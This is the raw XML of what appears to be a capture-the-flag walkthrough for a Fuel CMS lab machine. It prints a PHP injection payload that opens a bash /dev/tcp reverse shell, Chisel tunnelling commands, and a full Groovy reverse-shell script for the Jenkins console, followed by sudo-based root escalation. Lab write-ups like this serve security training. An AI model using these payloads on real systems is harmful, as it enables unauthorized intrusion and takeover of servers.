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FUEL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3s4v8n8r9xv5"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Nmap, a tool specialized in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4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completing the scan, we identified two open web ports, 80 and 8081. Now, we will direct our attention to the web service running on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98800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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analysis, we determined that it is a completely static page, the default Apache2 page. Now, we will proceed to inspect the web service on port 8081.</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19500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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application on port 8081, we noticed that it is a CMS (Fuel CMS), and immediately below we found the version indication “1.4”. After researching vulnerabilities in this CMS version, we identified the following exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Fuel CMS 1.4.1 - Remote Code Execution (3) </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https://www.exploit-db.com/exploits/50477</w:t>
        </w:r>
      </w:hyperlink>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Our payload will have the following configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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'+pi(print($a='system'))+$a('/bin/bash -c "sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1"')+'</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this step, we simply perform URL encoding:</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hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://urlencode.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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http://&lt;machine-ip&gt;:8081/fuel/pages/select/?filter=&lt;encoded-payload&gt;</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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447800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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49400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1485900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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19200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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root directory, we can obtain the first flag:</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58900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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retrieving our first user flag, it is time to escalate privileges to obtain our final flag. For this, we must escalate to the root user.</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command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -nlapt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can view the open ports on the server. There is a specific port, 8080, which is available only locally.</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44600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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curl 127.0.0.1:8080 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we determine that it is a web application. From the page title, we can infer that it is Jenkins, an open-source automation platform used for building, testing, and deploying software.</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81100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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use a tool called Chisel to perform port forwarding from port 8080 to our local machine, enabling access through our local browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId20">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/jpillora/chisel</w:t>
        </w:r>
      </w:hyperlink>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the tool, we proceed with transferring it to the remote server.</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5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remote server, we will use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command and then grant the necessary execution permissions:</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6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execute the tool first on our local machine:</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server -p 9000 --reverse</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1562100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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remote server:</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client &lt;ip-vpn&gt;:9000 R:8000:127.0.0.1:8080</w:t>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57300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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can access the application in our local browser via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:8000:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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2984500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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application, we can navigate to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/scripts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where we find a console that allows us to execute commands, making it possible to obtain a reverse shell.</w:t>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6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p3qcapkjxp4m" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>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gzrl39u4bp67" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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tb78akugikch" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">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jznkgf5tut8i" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat listener:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">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wvwru9g6jutt" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Groovy reverse shell:</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String host="&lt;ip-vpn&gt;";</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int port=4444;</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String cmd="bash";</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Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();</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Socket s=new Socket(host,port);</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InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();</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OutputStream po=p.getOutputStream(),so=s.getOutputStream();</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while(!s.isClosed()){</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while(pi.available()&gt;0)so.write(pi.read());</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while(pe.available()&gt;0)so.write(pe.read());</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while(si.available()&gt;0)po.write(si.read());</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so.flush();</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po.flush();</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Thread.sleep(50);</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try {p.exitValue();break;}catch (Exception e){}</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p.destroy();</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s.close();</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14500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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clicking “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”, we receive the connection.</w:t>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0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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0" l="0" r="0" t="0"/>
            <wp:docPr id="6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a fully interactive TTY shell, as mentioned earlier, we can escalate our privileges. By running the command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sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we observe that we have permission to execute any command with root privileges. Therefore, we simply execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo su </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to gain root access and retrieve the final flag located in the root user’s directory.</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89100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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B">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2"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C">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D">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2.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image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Fuel</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jpillora/chisel" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.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9.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.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6.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50477" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlencode.org/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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7N+dvdg+4yHCX8BGcysLs44FpA==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjNzNHY4bjhyOXh2NTIOaC5wM3FjYXBranhwNG0yDmguZ3pybDM5dTRicDY3Mg5oLnRiNzhha3VnaWtjaDIOaC5qem5rZ2Y1dHV0OGkyDmgud3Z3cnU5ZzZqdXR0Mg5oLjE3NWY1Y3M5NHowbzgAciExbzVTOUMyVkIwNUdOamNLellmQjdjOXdIdExlV1FqR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